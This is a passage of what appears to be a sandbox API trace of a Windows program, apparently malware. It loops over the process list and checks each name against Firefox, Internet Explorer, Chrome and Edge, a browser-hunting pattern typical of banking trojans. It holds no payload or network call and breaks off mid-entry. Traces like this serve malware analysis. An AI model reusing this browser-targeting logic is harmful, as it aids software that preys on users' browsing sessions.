[0166.474] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0166.475] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0166.475] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0166.475] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0166.475] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.475] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0166.476] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0166.476] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0166.476] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0166.476] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.476] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0166.476] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0166.477] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0166.477] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0166.477] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.477] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0166.477] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0166.477] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0166.477] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0166.477] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.477] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0166.478] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0166.478] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0166.478] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0166.478] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.478] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0166.478] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0166.478] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0166.478] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.478] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.479] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.479] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.479] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.479] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.479] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0166.480] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0166.480] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0166.480] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0166.480] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.480] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.480] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.480] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.480] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.480] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.480] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0166.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0166.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0166.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0166.615] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0166.616] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0166.616] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0166.616] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0166.616] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.618] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.619] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.619] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.619] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0166.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0166.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0166.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0166.619] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.619] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0166.620] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0166.620] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0166.620] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0166.620] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0166.620] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.621] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.621] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.621] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.621] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.621] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.622] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.622] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.623] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.623] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.623] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.623] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.623] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0166.624] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0166.624] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0166.624] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0166.624] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0166.624] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0166.625] CloseHandle (hObject=0xd4) returned 1 [0166.625] Sleep (dwMilliseconds=0x3e8) [0167.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0167.799] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.799] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0167.799] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0167.799] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0167.799] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0167.799] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.800] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0167.800] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0167.800] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0167.800] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0167.800] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.800] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0167.800] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0167.800] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0167.801] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.801] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0167.801] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0167.801] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0167.801] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.801] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.802] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0167.802] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0167.802] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0167.802] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.802] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0167.802] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0167.802] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0167.802] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.802] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0167.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0167.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0167.803] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.803] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.803] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0167.803] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0167.803] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0167.804] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.804] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0167.804] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0167.804] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0167.804] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.804] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0167.805] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0167.805] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0167.805] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0167.805] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.805] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.805] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.805] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.805] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.805] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.806] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.806] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.807] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.807] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.807] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.807] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.807] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.807] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.807] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.808] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.808] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.808] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.808] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.808] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0167.808] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0167.808] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0167.808] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.808] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.809] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0167.809] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.810] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0167.810] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0167.810] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0167.810] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0167.810] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.811] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0167.811] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0167.811] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0167.811] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0167.811] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0167.811] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0167.811] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0167.811] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0167.811] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, 